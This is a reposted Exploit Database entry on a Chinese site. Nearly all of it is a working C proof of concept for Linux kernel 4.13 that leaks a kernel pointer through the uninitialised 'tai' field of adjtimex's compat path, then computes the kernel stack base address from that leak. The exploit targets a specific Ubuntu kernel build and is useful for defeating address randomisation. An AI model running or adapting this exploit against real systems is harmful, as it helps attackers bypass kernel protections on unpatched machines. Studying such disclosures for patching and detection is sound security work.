Linux Kernel 4.13 – ‘compat_get_timex()’ Leak Kernel Pointer

Exploit Database
120 阅读

作者： wally0813

日期： 2019-01-21
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/46208/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

#define _GNU_SOURCE

#define _BSD_SOURCE

#include <sys/timex.h>

#include <stdio.h>

#include <stdint.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <sys/wait.h>

#include <sys/ioctl.h>

#include <sys/mman.h>

#include <sys/ipc.h>

#include <sys/sem.h>

#include <sys/stat.h>

#include <sys/mman.h>

#include <sys/resource.h>

#include <sys/syscall.h>

#include <errno.h>

#include <fcntl.h>

#include <unistd.h>

#include <kptr-lib.h>

// Ubuntu 4.13.0-16-generic

// gcc -o poc poc.c -m32

struct timex time;

int main(int argc, char **argv)

{

int r;

unsigned long long stack_offset, kernel_base;

unsigned int leak_value;

unsigned int high = 0xffffffff;

memset(&time, 0, sizeof(time));

time.modes = 0x8000;

mmap(0,0xa000,3,2022,-1,0);

adjtimex(&time);

leak_value = time.tai;

printf("--> leak_value : %x\n", leak_value);

memcpy(&kernel_base, &leak_value, 4);

memcpy((char *)&kernel_base + 4, &high, 4);

stack_offset = 0x1fc4a4;

kernel_base = leak_value - stack_offset;

printf("--> kernel_stack_base : %llx\n", kernel_base);

return 0;

}